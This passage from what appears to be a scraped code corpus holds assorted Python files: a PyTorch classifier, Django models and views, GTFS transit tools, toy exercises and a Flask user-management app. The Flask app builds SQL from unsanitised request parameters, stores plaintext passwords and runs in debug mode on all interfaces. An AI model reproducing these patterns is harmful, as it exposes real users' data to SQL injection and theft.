-1)\n out = self.layer4(out)\n return out\n\ncnn = CNN()\n\ncnn.cuda()\n\ncriterion = nn.CrossEntropyLoss()\noptimizer = optim.Adam(cnn.parameters(), lr=learning_rate)\n# -----------------------------------------------------------------------------------\nstart = time()\n# Train the Model\nlosses = []\nfor epoch in range(epochs):\n for i, (images, labels) in enumerate(train_loader):\n images = Variable(images).cuda()\n labels = Variable(labels).cuda()\n\n # Forward + Backward + Optimize\n optimizer.zero_grad()\n outputs = cnn(images)\n loss = criterion(outputs, labels)\n loss.backward()\n optimizer.step()\n losses.append(loss.item())\n if (i + 1) % 10 == 0:\n print('Epoch [%d/%d], Step [%d/%d], Loss: %.4f'\n % (epoch + 1, epochs, i + 1, len(train_data) // batch_size, loss.data[0]))\n\n\n# -----------------------------------------------------------------------------------\n# Test the Model\ncnn.eval() # Change model to 'eval' mode (BN uses moving mean/var).\ncorrect = 0\ntotal = 0\npred_prob = []\npred = []\ny = []\nfor images, labels in test_loader:\n images = Variable(images).cuda()\n outputs = cnn(images)\n _, predicted = torch.max(outputs.data, 1)\n #get probabilty\n prob = nn.functional.softmax(outputs, dim=1)\n pred_prob.append(prob.detach().cpu().numpy())\n pred.append(predicted.cpu().numpy())\n y.append(labels.cpu().numpy())\n\n total += labels.size(0)\n correct += (predicted.cpu() == labels).sum()\nend = time()\nprint('Computational Time:', end - start)\n# -----------------------------------------------------------------------------------\nprint('Test Accuracy of the model on the 1000 test images: %d %%' % (100 * correct / total))\n\n\n#----------\n#plot train loss\nplt.title(\"CrossEntropyLoss\")\nplt.xlabel('Iteration')\nplt.ylabel('Loss')\nplt.plot(losses)\nplt.ylim(0,3.2)\nplt.show()\n\n#classification report\ny_true = np.concatenate(y,axis=0)\npred = np.concatenate(pred).ravel()\nclassification_report = classification_report(y_true, pred, target_names=target_list)\nprint(\"Classfication report:\")\nprint(classification_report)\n\n#calculate ROC\npred_prob = np.concatenate(pred_prob, axis=0)\ny = np.concatenate(y,axis=0)\ny_dummy = pd.get_dummies(y).values\n\nfpr = dict()\ntpr = dict()\nroc_auc = dict()\n\nfor i in range(len(target_list)):\n fpr[i], tpr[i], _ = metrics.roc_curve(y_dummy[:,i], pred_prob[:,i])\n roc_auc[i] = metrics.auc(fpr[i],tpr[i])\n\ncolors = (['blue', 'red', 'green',\"yellow\",\"pink\",\"blue\",\"orange\"])\nfor i, color in zip(range(7), colors):\n plt.plot(fpr[i], tpr[i], color=color,\n label='ROC curve of class {0} (area = {1:0.2f})'\n ''.format(i, roc_auc[i]))\nplt.plot([0, 1], [0, 1], 'k--',)\nplt.xlim([0, 1])\nplt.ylim([0,1])\nplt.xlabel('False Positive Rate')\nplt.ylabel('True Positive Rate')\nplt.title('Receiver operating characteristic for all labels')\nplt.legend(loc=\"lower right\")\n\nplt.show()\n\n","sub_path":"Code/Subspecies_Torch.py","file_name":"Subspecies_Torch.py","file_ext":"py","file_size_in_byte":6463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"113347916","text":"# -*- encoding: utf-8 -*-\n__author__ = 'yannan'\nfrom flask import Flask,request,render_template,redirect,url_for\nimport conn_db\napp = Flask(__name__)\n@app.route('/')\ndef index():\n sql_comm = 'select * from userinfo'\n return render_template(\"index.html\",data=conn_db.mysql_select(sql_comm))\n@app.route('/add')\ndef add():\n user = request.args.get('user')\n pwd = request.args.get('pwd')\n sql_comm = 'select username from userinfo where username =\"%s\"' %(user)\n user_exist = conn_db.mysql_select(sql_comm)\n if not user or not pwd:\n return '

need user and pwd

'+redirect(url_for('index'))\n elif user_exist:\n return '

user exist

'+redirect(url_for('index'))\n else:\n sql_comm = 'insert into userinfo(username,password) values(\"%s\",\"%s\")' %(user,pwd)\n conn_db.mysql_select(sql_comm)\n return redirect(url_for('index'))\n@app.route('/delete')\ndef delete():\n user = request.args.get('user')\n sql_comm='delete from userinfo where username=\"%s\"' %(user)\n conn_db.mysql_select(sql_comm)\n return redirect(url_for('index'))\nif __name__=='__main__':\n app.run(debug=True,host=\"0.0.0.0\",port=9527)","sub_path":"07/yannan/rebuildw06-v2.py","file_name":"rebuildw06-v2.py","file_ext":"py","file_size_in_byte":1160,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"45315271","text":"from django.db import models\nfrom apps.usergroups.models import Agent\nfrom apps.oauthaccounts.models import OAuthAccount\n\n# Create your models here.\nclass EmailAccount(models.Model):\n agent = models.ForeignKey(Agent,on_delete=models.CASCADE)\n email = models.EmailField(max_length=255, unique=True)\n GOOGLE = \"GOO\"\n OUTLOOK = \"OUT\"\n YAHOO = \"YAH\"\n OTHERS = \"OTH\"\n EMAIL_SERVICE_PROVIDERS = (\n (GOOGLE, 'Google'),\n (OUTLOOK, 'Outlook'),\n (YAHOO, 'Yahoo'),\n (OTHERS, 'Others'),\n )\n email_service_provider = models.CharField(max_length=3, choices=EMAIL_SERVICE_PROVIDERS)\n oauth = models.OneToOneField(OAuthAccount, on_delete=models.CASCADE, null=True, blank=True)\n #smtp_settings - future use\n\n def __str__(self):\n return self.agent.business_alias + \" - \" + self.email","sub_path":"propelproject/apps/emailaccounts/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":828,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"573562675","text":"# Shawn Wright\r\n# 4/9/18\r\n# The file we used in class ( pet)\r\n\r\nimport pet\r\n\r\ndef main():\r\n # local varibles\r\n\r\n pet_name = \"\"\r\n pet_type = \"\"\r\n pet_age = \"\"\r\n\r\n # get pet data\r\n pet_name = input(\"Enter the name of the pet: \")\r\n pet_type = input(\"Enter the type of the pet: \")\r\n pet_age = int(input(\"Enter the age of the pet: \"))\r\n\r\n # Create an insance of the pet class and assign it to an object\r\n mypet = pet.Pet(pet_name, pet_type, pet_age)\r\n\r\n\r\n # display the datat that was entered\r\n print(\"here is the data that you entered\")\r\n print(\"pet name: \", mypet.get_name())\r\n print(\"pet type: \", mypet.get_animal_type())\r\n print(\"pet type: \", mypet.get_age())\r\n \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\nmain()\r\n","sub_path":"Classes/EXAMPLES/wright_cw49.py","file_name":"wright_cw49.py","file_ext":"py","file_size_in_byte":745,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"48943861","text":"import random\n\nsymbols = ['rock', 'paper', 'scissors']\n\nplayer_wins = 0\ncomputer_wins = 0\n\nwhile max([player_wins, computer_wins]) < 3:\n player_symbol = None\n while player_symbol is None:\n input_symbol = input(\"what symbol do you want? \")\n if input_symbol in symbols:\n player_symbol = input_symbol\n else:\n print('please pick rock, paper, or scissors')\n\n computer_symbol = random.choice(symbols)\n\n print('Player: ', player_symbol)\n print('Computer: ', computer_symbol)\n\n if player_symbol == computer_symbol:\n print ('TIE!')\n elif player_symbol == 'rock':\n if computer_symbol == 'paper': \n print('COMPUTER_WINS!')\n computer_wins += 1\n else:\n print('Player wins!')\n player_wins += 1\n elif player_symbol == 'paper':\n if computer_symbol == 'scissors':\n print ('COMPUTER WINS!')\n computer_wins += 1\n else:\n print('PLAYER WINS!')\n player_wins +=1\n elif player_symbol == 'rock':\n if computer_symbol == 'scissors':\n print ('COMPUTER WINS!')\n computer_wins += 1\n else:\n print('PLAYER WINS!')\n player_wins +=1\n print('Player Wins:')\n print(player_wins)\n print('computer wins:')\n print(computer_wins)\n \n \n \n","sub_path":"rps_norman2.py","file_name":"rps_norman2.py","file_ext":"py","file_size_in_byte":1388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"631885308","text":"import requests\nimport traceback\nimport logging\nimport json\nfrom robot.libraries.BuiltIn import ExecutionFailed\n\n\nlogger = logging.getLogger(__file__)\n\n\nclass ControllerAdapter(object):\n def __init__(self, endpoint):\n self.endpoint = endpoint\n\n def _post(self, url_path, data):\n url = 'http://%s/%s' % (self.endpoint, url_path)\n headers = {'Content-Type': 'application/json'}\n\n logger.info('Sending request to %s' % url)\n resp = None\n try:\n resp = requests.post(url=url, headers=headers, data=json.dumps(data))\n except requests.RequestException:\n logger.debug('Error during request %s' % url)\n logger.debug(traceback.format_exc())\n return\n finally:\n if resp is not None and resp.status_code != 200:\n msg ='Server responded with error code: %s' % str(resp.text)\n logger.debug(msg)\n raise ExecutionFailed(msg)\n\n logger.info('Request success %s' % resp.text)\n\n def clean_data(self):\n self._post(url_path='force_clean', data={})\n\n def create_network(self, name, cidr):\n data = {'name': name, 'cidr': cidr}\n self._post(url_path='create/network', data=data)\n\n def create_logical_port(self, net_id, docker_id, docker_ip):\n data = {'net_id': net_id,\n 'container': {\n 'id': docker_id,\n 'ip': docker_ip\n }}\n self._post(url_path='create/logical_port', data=data)\n\n def remove_logical_port(self, net_id, docker_id, docker_ip):\n data = {'net_id': net_id,\n 'container': {\n 'id': docker_id,\n 'ip': docker_ip\n }}\n self._post(url_path='remove/logical_port', data=data)","sub_path":"robot-tests/libs/ControllerAdapter.py","file_name":"ControllerAdapter.py","file_ext":"py","file_size_in_byte":1817,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"565387643","text":"from Crypto.PublicKey import RSA as cryRSA\r\nimport AES256\r\nimport RSA\r\nimport ECDSA\r\n\r\nroot_dir = 'D:\\Design\\Pycharm\\\\Network\\jilei_xiao_xue_qi\\Keys'\r\n\r\n\r\ndef load_rsa_file(fn):\r\n key = None\r\n try:\r\n key = cryRSA.importKey(open(fn).read())\r\n except Exception as err:\r\n print('导入rsa的KEY文件出错', fn, err)\r\n return key\r\n\r\n\r\ndef encode(data, mode):\r\n if mode == 'aes256':\r\n cipher = AES256.encode(data)\r\n return cipher\r\n elif mode == 'rsa':\r\n pubkey = load_rsa_file(root_dir + '\\master\\\\rsa_public_key.pem')\r\n cipher = RSA.rsa_enc(data, pubkey)\r\n return cipher\r\n elif mode == 'ecdsa':\r\n signature = ECDSA.sign(bytes(data,encoding='utf-8'))\r\n return signature\r\n else:\r\n print('other')\r\n\r\n\r\ndef decode(cipher, mode, message=None, signature=None):\r\n if mode == 'aes256':\r\n plain = AES256.decode(cipher)\r\n return plain\r\n elif mode == 'rsa':\r\n prikey = load_rsa_file(root_dir + '\\ghost\\\\rsa_private_key.pem')\r\n plain = RSA.rsa_dec(cipher, prikey)\r\n return plain\r\n elif mode == 'ecdsa':\r\n ECDSA.verify(message, signature)\r\n else:\r\n print('other')\r\n\r\n\r\nif __name__ == '__main__':\r\n message = '纪磊'\r\n mode1 = 'aes256'\r\n mode2 = 'rsa'\r\n mode = mode2\r\n\r\n cipher = encode(message, mode)\r\n plain = decode(cipher, mode)\r\n print(plain)\r\n","sub_path":"crypto/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"178803031","text":"\"\"\"\nThis module defines a ``Feed`` class to represent GTFS feeds.\nThere is an instance attribute for every valid GTFS table (routes, stops, etc.), which stores the table as a Pandas DataFrame, or as ``None`` in case that table is missing.\n\nThe ``Feed`` class also has heaps of methods: a method to compute route stats, a method to compute screen line counts, validations methods, etc.\nTo ease reading, almost all of these methods are defined in other modules and grouped by theme (``routes.py``, ``stops.py``, etc.).\nThese methods, or rather functions that operate on feeds, are then imported within the ``Feed`` class.\nHowever, this separation of methods messes up the ``Feed`` class documentation slightly by introducing an extra leading ``feed`` parameter in the method signatures.\nIgnore that extra parameter; it refers to the ``Feed`` instance, usually called ``self`` and usually hidden automatically by documentation tools.\n\nConventions in the code below:\n - Dates are encoded as date strings of the form YYMMDD\n - Times are encoded as time strings of the form HH:MM:SS with the possibility that the hour is greater than 24\n - 'DataFrame' and 'Series' refer to Pandas DataFrame and Series objects, respectively\n\"\"\"\nfrom pathlib import Path\nimport tempfile\nimport shutil\nfrom collections import OrderedDict\n\nimport pandas as pd\nimport shapely.geometry as sg\n\n\nclass Feed(object):\n \"\"\"\n An instance of this class represents a not-necessarily-valid GTFS feed, where GTFS tables are stored as DataFrames.\n Beware that the stop times DataFrame can be big (several gigabytes), so make sure you have enough memory to handle it.\n\n Public instance attributes:\n\n - ``agency``\n - ``stops``\n - ``routes``\n - ``trips``\n - ``stop_times``\n - ``calendar``\n - ``calendar_dates``\n - ``fare_attributes``\n - ``fare_rules``\n - ``shapes``\n - ``frequencies``\n - ``transfers``\n - ``feed_info``\n \"\"\"\n gtfs_tables = [\n 'agency',\n 'calendar',\n 'calendar_dates',\n 'fare_attributes',\n 'fare_rules',\n 'feed_info',\n 'frequencies',\n 'routes',\n 'shapes',\n 'stops',\n 'stop_times',\n 'trips',\n 'transfers',\n ]\n\n str_fields= [\n 'agency_id'\n 'trip_id',\n 'service_id',\n 'shape_id',\n 'block_id',\n 'route_id',\n 'stop_id',\n 'fare_id',\n 'origin_id',\n 'destination_id',\n 'contains_id',\n 'from_stop_id',\n 'to_stop_id',\n 'parent_station',\n ]\n\n def __init__(self, agency=None, stops=None, routes=None,\n trips=None, stop_times=None, calendar=None, calendar_dates=None,\n fare_attributes=None, fare_rules=None, shapes=None,\n frequencies=None, transfers=None, feed_info=None):\n \"\"\"\n Assume that every non-None input is a Pandas DataFrame.\n No formats are checked.\n In particular, a Feed instance need not represent a valid GTFS feed.\n \"\"\"\n # Set primary attributes; the @property magic below will then\n # validate some and automatically set secondary attributes\n for prop, val in locals().items():\n if prop in Feed.gtfs_tables:\n setattr(self, prop, val)\n \n def __str__(self):\n d = OrderedDict()\n for table in Feed.gtfs_tables:\n try:\n d[table] = getattr(self, table).head(5)\n except:\n d[table] = None\n return '\\n'.join(['* {!s} --------------------\\n\\t{!s}'.format(k, v) for k, v in d.items()])\n\n def build_geometry_by_shape(self, shape_ids=None):\n \"\"\"\n Given a GTFS feed object, return a dictionary with structure \n shape ID -> Shapely LineString representation of shape,\n where the dictionary ranges over all shapes in the feed.\n Use WGS84 longitude-latitude coordinates, the native coordinate system of GTFS.\n\n If a list of shape IDs ``shape_ids`` is given, \n then only include the given shape IDs in the dictionary.\n\n NOTES:\n - Raise a ValueError if the feed has no shapes\n \"\"\"\n if self.shapes is None:\n raise ValueError('This feed has no shapes')\n\n d = dict()\n sh = self.shapes.copy()\n\n # Restrict shapes if necessary\n if shape_ids is not None:\n sh = sh[sh['shape_id'].isin(shape_ids)]\n\n sh = sh.sort_values(['shape_id', 'shape_pt_sequence'])\n\n for shid, group in sh.groupby('shape_id'):\n lonlats = group[['shape_pt_lon', 'shape_pt_lat']].values\n d[shid] = sg.LineString(lonlats)\n\n return d\n\n def trip_to_geojson(self, trip_id):\n \"\"\"\n Given a GTFS feed object and a trip ID from that feed,\n return a GeoJSON LineString feature (as a Python dictionary)\n representing the trip's geometry and its metadata\n (trip ID, direction ID, headsign, etc.).\n Use WGS84 coordinates, the native coordinate system of GTFS.\n\n NOTES:\n Raise a ``ValueError`` if the appropriate GTFS data does not exist.\n \"\"\"\n if trip_id not in self.trips['trip_id'].values:\n raise ValueError('Trip ID {!s} not present in feed trips'.format(trip_id))\n\n # Get trip data as dictionary, replacing numpy.nan with 'n/a' to ease later\n # conversion to JSON\n t = self.trips.copy()\n d = t[t['trip_id'] == trip_id].fillna('n/a').to_dict(orient='records')[0]\n\n # Get Shapely LineString for trip shape\n shid = d['shape_id']\n geom = self.build_geometry_by_shape(shape_ids=[shid])[shid]\n\n # Convert LineString to GeoJSON format\n result = {\n 'type': 'Feature', \n 'properties': d,\n 'geometry': sg.mapping(geom),\n }\n return result\n\n def compute_screen_line_counts(self, linestring):\n \"\"\"\n Find all trips in the given GTFS self object that intersect the given Shapely LineString\n (given in WGS84 coordinates), and return a data frame with the columns:\n\n - ``'trip_id'``\n - ``'route_id'``\n - ``'route_short_name'``\n - ``'direction_id'``\n - ``'shape_id'``\n \"\"\"\n # Convert all shapes to linestrings\n geometry_by_shape = self.build_geometry_by_shape()\n\n # Interate through linestrings to find intersections with screenline\n hits = []\n for shid, geom in geometry_by_shape.items():\n if geom.intersects(linestring):\n hits.append(shid)\n\n # Compile trip info for hits\n t = self.trips.copy()\n t = t[t['shape_id'].isin(hits)].copy()\n result = t.merge(self.routes) # Add more route info\n\n return result[['trip_id', 'route_id', 'route_short_name', 'direction_id', 'shape_id']]\n\ndef read_gtfs(path):\n \"\"\"\n Given a path (string or pathlib object) to a (zipped) GTFS feed,\n read the feed and return its corresponding Feed instance.\n\n NOTES:\n - Ignore files that are not valid GTFS; see https://developers.google.com/transit/gtfs/reference/.\n - Ensure that all ID fields that could be string ('stop_id', 'route_id', etc.) are parsed as strings and not as numbers. \n \"\"\"\n path = Path(path)\n \n # Unzip feed into temporary directory\n tmp_dir = tempfile.TemporaryDirectory()\n shutil.unpack_archive(str(path), tmp_dir.name, 'zip')\n\n # Read valid GTFS files into Pandas data frames\n feed_dict = {}\n dtype = {field: str for field in Feed.str_fields} # ensure some string types\n for p in Path(tmp_dir.name).iterdir(): \n name = p.stem\n if name in Feed.gtfs_tables:\n feed_dict[name] = pd.read_csv(p, dtype=dtype)\n \n # Delete temporary directory\n tmp_dir.cleanup()\n \n return Feed(**feed_dict)","sub_path":"homework_solutions/new_gtfs_tools.py","file_name":"new_gtfs_tools.py","file_ext":"py","file_size_in_byte":7849,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"399142588","text":"\"\"\"Unit tests for Location model.\"\"\"\nfrom django.test import TestCase\nfrom django.contrib.gis.geos import Point\nfrom opianalytics.apps.location.models.location import Location\nfrom django.core.exceptions import ValidationError\nimport pathlib\n\n\nclass LocationModelTestCase(TestCase):\n \"\"\"Provide the tests of the Location model.\"\"\"\n\n def setUp(self):\n self.test_absolue_path = pathlib.Path(__file__).parent.absolute()\n \n def test_int_when_add_valid_coordinates(self):\n # Setup\n latitude = 19.3576284\n longitude = -99.2725381\n\n # Execution\n location_id = Location.objects.add(latitude, longitude)\n\n # Validation\n self.assertEqual(type(location_id), int)\n\n def test_error_when_add_invalid_coordinates(self):\n # Setup\n latitude = '1234'\n longitude = 'abcd'\n\n # Validation\n self.assertRaises(\n ValidationError,\n lambda: Location.objects.add(latitude, longitude)\n )\n\n def test_error_when_add_from_csv_not_found(self):\n # Setup\n csv_fake_filename = '{0}/{1}'.format(\n self.test_absolue_path, 'fake.csv'\n )\n \n # Validation\n self.assertRaises(\n ValidationError,\n lambda: Location.objects.add_from_csv(csv_fake_filename)\n )\n\n def test_3_when_add_from_csv(self):\n # Setup\n csv_filename = '{0}/{1}'.format(\n self.test_absolue_path, 'locations_valid.csv'\n )\n\n # Execution\n total_locations_added = Location.objects.add_from_csv(csv_filename)\n \n # Validation\n self.assertEqual(total_locations_added, 3)\n\n def test_2_when_add_from_csv_repeated(self):\n # Setup\n csv_filename = '{0}/{1}'.format(\n self.test_absolue_path, 'locations_repeated.csv'\n )\n\n # Execution\n total_locations_added = Location.objects.add_from_csv(csv_filename)\n \n # Validation\n self.assertEqual(total_locations_added, 2)\n","sub_path":"backend/opianalytics/apps/location/tests/test_location_model.py","file_name":"test_location_model.py","file_ext":"py","file_size_in_byte":2034,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"644084220","text":"import json\nimport sys\nimport time\nfrom collections import Counter\n\nimport pandas as pd\nimport yaml\n\n\nclass JsonFileWordCountProgram:\n\n def get_yaml_property(self):\n '''\n yaml 형태의 property 파일을 읽어들임\n :return: object 형태의 데이터\n '''\n \n with open(\"property.yml\") as file:\n data = yaml.load(file, Loader=yaml.FullLoader)\n\n return data\n\n def get_key_data_from_json_file(self, input_file_name, key):\n '''\n json 파일에서 해당하는 key값에만 해당하는 데이터를 가져옴\n :param inputFileName: input 파일 이름\n :param key: 가져올 key의 이름\n :return: key값에만 해당하는 2차원 list 형태의 데이터\n '''\n\n key_data = []\n with open(input_file_name, encoding='UTF-8') as f:\n for line in f:\n json_data = json.loads(line)\n key_data.append(json_data[key])\n\n return key_data\n\n def split_data_by_blank(self, data):\n '''\n string 형태의 input을 공백으로 나눠서 2차원 list 형태로 return\n :param raw_data: input 데이터\n :return: 공백으로 나눠진 2차원 list 형태의 데이터\n '''\n\n for index in range(len(data)):\n data[index] = data[index].split()\n\n return data\n\n def get_count_by_word(self, splitted_data):\n '''\n 각 단어의 개수를 셈\n :param splitted_data: 공백 단위로 나눠진 list 형태의 데이터\n :return: counted_data = 각 단어의 개수가 세어진 데이터, the_number_of_word = 파일이 가지고 있는 총 단어의 개수 (set)\n '''\n\n counted_data = Counter()\n for i in range(len(splitted_data)):\n counted_data.update(splitted_data[i])\n\n the_number_of_words = len([key for key, value in counted_data.items()])\n\n return counted_data, the_number_of_words\n\n def sort_collections_to_list(self, property_data, counted_data, length):\n '''\n collections 형태의 데이터를 정렬하여 list 형태로 return\n :param property_data: sort option을 선택하기 위한 property data\n :param counted_data: 각 단어가 몇 개 인지 세어진 데이터\n :param length: input 파일이 가지고 있는 총 단어의 개수 (set)\n :return: 내림차순이나 오름차순으로 정렬한 list 형태의 데이터\n '''\n\n sort_option = property_data['sort option']\n \n if sort_option == 'descending':\n sorted_list = counted_data.most_common(n=length) # 내림차순\n elif sort_option == 'ascending':\n sorted_list = list(reversed(counted_data.most_common(n=length))) # 오름차순\n else:\n print(\"Error: property 파일에 적을 수 있는 'sort option' 내림차순과 오름차순입���다. (option: descending, ascending)\")\n sys.exit()\n\n return sorted_list\n\n def list_to_dict(self, list_data):\n '''\n list 형태의 데이터를 dictionary 형태의 데이터로 변환\n :param list_data:\n :return: dictionary 형태의 데이터\n '''\n \n dict_data = dict((x, y) for x, y in list_data)\n\n return dict_data\n\n def dict_to_dataframe(self, dict_data, columns_name):\n '''\n dictionary 형태에서 dataframe 형태로 변환\n :param dict_data: dictionary 형태의 데이터\n :param columns_name: dataframe의 column 이름을 담은 list\n :return: dataframe 형태의 데이터\n '''\n \n dataframe_data = pd.DataFrame.from_dict(dict_data, orient='index', columns=columns_name)\n\n return dataframe_data\n\n def write_result_data(self, property_data, output_data):\n '''\n 확장자에 맞게 최종 데이터셋 저장\n :param property_data: 옵션을 선택하기 위한 property data\n :param output_data: 최종적으로 저장할 데이터\n :return: 없음\n '''\n\n outputFileName = property_data['output']\n try:\n ext = outputFileName.split('.')[1]\n except IndexError as e:\n print(\"'property' 파일의 'output'에 파일 확장자를 붙여서 적어주시기 바랍니다: {}\".format(e))\n\n dict_data = self.list_to_dict(output_data)\n columns = ['count']\n final_data = self.dict_to_dataframe(dict_data, columns)\n\n if (ext == \"csv\"): # result to csv\n try:\n final_data.to_csv(outputFileName, index=True, header=['count'], encoding='UTF-8-sig')\n except PermissionError as e:\n print(\"해당 CSV파일을 닫아주시기 바랍니다: {}\".format(e))\n elif (ext == \"txt\"): # result to txt\n with open(outputFileName, 'w', encoding='UTF-8') as file:\n for c in range(len(final_data)):\n file.writelines(str(final_data.index[c]) + ' ' + str(final_data['count'][c]) + \"\\n\")\n elif (ext == \"json\"): # result to json\n final_data.to_json(outputFileName, orient='table', encoding='UTF-8')\n else:\n print(\"Error: 해당되는 확장자만 적어주세요. (csv, txt, json)\")\n sys.exit()\n\n def run(self):\n '''\n main function of this program: 단어 개수 내림차순 출력하기\n :return: 없음\n '''\n\n now = time.localtime()\n print(\"시작 시간: %04d/%02d/%02d %02d:%02d:%02d\" % (now.tm_year, now.tm_mon, now.tm_mday, now.tm_hour, now.tm_min, now.tm_sec))\n\n start_time1 = time.time()\n property_data = self.get_yaml_property()\n end_time1 = time.time()\n total_time1 = end_time1 - start_time1\n print(\"self.get_yaml_property: {} sec\".format(total_time1))\n\n start_time2 = time.time()\n key_data_from_json = self.get_key_data_from_json_file(property_data[\"input\"], property_data[\"key\"])\n end_time2 = time.time()\n total_time2 = end_time2 - start_time2\n print(\"self.get_key_data_from_json_file: {} sec\".format(total_time2))\n\n start_time3 = time.time()\n split_data = self.split_data_by_blank(key_data_from_json)\n end_time3 = time.time()\n total_time3 = end_time3 - start_time3\n print(\"self.split_data_by_blank: {} sec\".format(total_time3))\n\n start_time4 = time.time()\n counted_data, num = self.get_count_by_word(split_data)\n end_time4 = time.time()\n total_time4 = end_time4 - start_time4\n print(\"self.get_count_by_word: {} sec\".format(total_time4))\n\n start_time5 = time.time()\n sorted_list = self.sort_collections_to_list(property_data, counted_data, num)\n end_time5 = time.time()\n total_time5 = end_time5 - start_time5\n print(\"self.sort_collections_to_list: {} sec\".format(total_time5))\n\n start_time6 = time.time()\n self.write_result_data(property_data, sorted_list)\n end_time6 = time.time()\n total_time6 = end_time6 - start_time6\n print(\"self.write_result_data: {} sec\".format(total_time6))\n\n print(\"[프로그램 종료]\")\n print(\"걸린 시간: {}\".format(total_time1 + total_time2 + total_time3 + total_time4 + total_time5 + total_time6))\n\n\n\n\n\nif __name__ == \"__main__\":\n jsonFileWordCountProgram = JsonFileWordCountProgram()\n jsonFileWordCountProgram.run()\n","sub_path":"problem3/jsonFileWordCountProgram.py","file_name":"jsonFileWordCountProgram.py","file_ext":"py","file_size_in_byte":7449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"116931544","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.4 (62061)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-i686/egg/evogrid/common/evaluators.py\n# Compiled at: 2006-08-10 15:54:24\n\"\"\"Adapters for evaluator components\n\nAs Evaluator components are highly representation dependent, no default\nimplementation is provided.\n\nHowever, you will find here a default multi-adapter for the following scheme:\n(IEvaluator, IProvider) -> IProvider\n\"\"\"\nfrom zope.interface import implements\nfrom zope.component import provideAdapter, adapts\nfrom evogrid.caching.interfaces import ICache\nfrom evogrid.caching.ram import RAMCache\nfrom evogrid.interfaces import IEvaluator\nfrom evogrid.interfaces import IProvider\n\nclass BaseEvaluator(object):\n \"\"\"Abstract class to provide default implementation for ``evaluate``\"\"\"\n __module__ = __name__\n\n def compute_fitness(self, cs):\n raise NotImplementedError\n\n def evaluate(self, rep):\n rep.evaluation = self.compute_fitness(rep.candidate_solution)\n\n\nclass ProviderFromEvaluator(object):\n \"\"\"Default adapter to use evaluator with providers chains\n\n This uses a class that wraps a generator since generators are builtin python\n objects that do not support interface implementation.\n \"\"\"\n __module__ = __name__\n implements(IProvider)\n adapts(IEvaluator, IProvider)\n\n def _buildGenerator(self, evaluator, provider):\n while True:\n replicator = provider.next()\n evaluator.evaluate(replicator)\n yield replicator\n\n def __init__(self, evaluator, provider):\n generator = self._buildGenerator(evaluator, provider)\n self._generator = generator\n\n def next(self):\n return self._generator.next()\n\n def __iter__(self):\n return self._generator\n\n\nprovideAdapter(ProviderFromEvaluator)\n_marker = object()\n\nclass MemoizedEvaluator(BaseEvaluator):\n \"\"\"Base implementation of a memoize wrapper\n\n The key used is built on the ``candidate_solution`` attribute of the\n replicator being evaluated.\n \"\"\"\n __module__ = __name__\n implements(IEvaluator)\n adapts(IEvaluator, ICache)\n\n def __init__(self, evaluator, cache=None):\n self._evaluator = evaluator\n if cache is None:\n cache = RAMCache(max_entries=100)\n self._cache = cache\n self._key_common = {'class': evaluator.__class__.__name__, 'method': 'evaluate'}\n return\n\n def compute_fitness(self, cs):\n key = self._key_common.copy()\n key['cs'] = cs\n result = self._cache.query(key, _marker)\n if result is _marker:\n result = self._evaluator.compute_fitness(cs)\n self._cache.set(key, result)\n return result\n else:\n return result","sub_path":"pycfiles/evogrid-0.1.0-py2.4/evaluators.py","file_name":"evaluators.py","file_ext":"py","file_size_in_byte":2821,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"349447697","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.macosx-10.13-x86_64/egg/reviewboard/reviews/evolutions/reviewrequest_unique_together_baseline.py\n# Compiled at: 2020-02-11 04:03:56\nfrom __future__ import unicode_literals\nfrom django_evolution.mutations import ChangeMeta\nMUTATIONS = [\n ChangeMeta(b'ReviewRequest', b'unique_together', (\n ('commit_id', 'repository'),\n ('changenum', 'repository'),\n ('local_site', 'local_id')))]","sub_path":"pycfiles/ReviewBoard-3.0.17-py2.7/reviewrequest_unique_together_baseline.py","file_name":"reviewrequest_unique_together_baseline.py","file_ext":"py","file_size_in_byte":552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"431847054","text":"from django.shortcuts import render, redirect\nfrom cmdb.models import AssetHosts\n\n# Create your views here.\n\n\ndef hosts(request):\n is_login = request.session.get('is_login', False)\n hosts_all = AssetHosts.objects.all()\n if is_login:\n return render(request, 'cmdb/hosts.html', {'hosts_data': hosts_all})\n else:\n return redirect('/login/')\n\n\ndef app(request):\n is_login = request.session.get('is_login', False)\n if is_login:\n return render(request, 'cmdb/app.html')\n else:\n return redirect('/login/')","sub_path":"cmdb/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"415025471","text":"\"\"\"\nProject Euler - Problem 3\n\"\"\"\n\n\ndef gen_primes():\n D = {}\n q = 2\n while True:\n if q not in D:\n yield q\n D[q * q] = [q]\n else:\n for p in D[q]:\n D.setdefault(p + q, []).append(p)\n del D[q]\n q += 1\n\n\ndef prime_factor(number):\n 